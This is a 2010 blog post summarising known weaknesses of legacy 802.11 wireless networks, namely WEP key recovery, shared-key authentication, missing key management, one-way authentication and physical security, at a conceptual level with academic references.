WLAN (802.11) Compromises and Vulnerabilities
Posted in Security on November 10th, 2010 by Rachael
Whilst relatively secure in 1997, the WEP algorithm can now days be easily cracked. To compromise the vulnerable WEP algorithm, an adversary must employ a sniffer, which “passively monitors the WLAN and computes the encryption keys after a variable number of packets have been sniffed” [3]. The goal is to recover two ciphertexts with identical initialisation vectors. Once found, the key can be computed which enables an adversary to read any packet passed over the network [4].
Shared-key authentication involves an initial exchange of a plaintext challenge from the access point to the station. This is a major vulnerability as an eavesdropper could intercept the plaintext challenge and encrypted response, thereby giving them enough information to make computation of the pseudorandom number feasible [1]. This in turn could enable the adversary to authenticate to the access point [3].
Another vulnerability of a network implementing the 802.11-1997 standard is that the standard does not provide key management services. Because the administrators of an 802.11-1997 network are responsible for creating, distributing, archiving and destroying WEP shared-keys, quite often keys are not updated regularly [3]. This increases the risk of an adversary finding trends in sniffed data and computing the WEP key. Because key management is so tedious, many administrators use the same WEP key for multiple devices, which increases the chance of finding trends in sniffed data.
Using one way authentication between stations and access points is another major vulnerability in 802.11-1997 wireless networks. The station is forced to automatically trust that the access point it is trying to communicate with is legitimate [3]. This vulnerability can be exploited through a wormhole attack. This particular attack method involves an attacker pretending to be access points and thus distorting a “large percentage of traffic” [2]. This can cause denial of service if the distorted route is extremely slow. Also, malicious code can be injected while data arrives at attacker-owned devices, and then forwarded to other devices [2].
Physical security systems can be compromised by a determined adversary. For example, locks can be picked and photo identification can be forged. Minimising the range of the network’s radio frequency can also be bypassed by an adversary who gains access to the building. Similarly, MAC address blocking can be compromised by gaining access to an authorised station.
References
[1] ”IEEE Std 802.11-1997 Information Technology- telecommunications And Information exchange Between Systems-Local And Metropolitan Area Networks-specific Requirements-part 11: Wireless Lan Medium Access Control (MAC) And Physical Layer (PHY) Specifications,” IEEE Std 802.11-1997, pp. i-445, 1997.
[2] S. Glass, “Wireless Network Security,” in COMS4507 Lecture University of Queensland, Brisbane, 2008.
[3] D. Scarfone K., D., Sexton, M. & Tibbs, C., “Guide to Securing Legacy IEEE 802.11 Wireless Networks,” Gaithersburg 2008.
[4] A. Stubblefield, Ioannidis, J. & Rubin, A., “Using the Fluhrer, Mantin, and Shamir Attack to Break WEP,” AT&T Labs 2001.
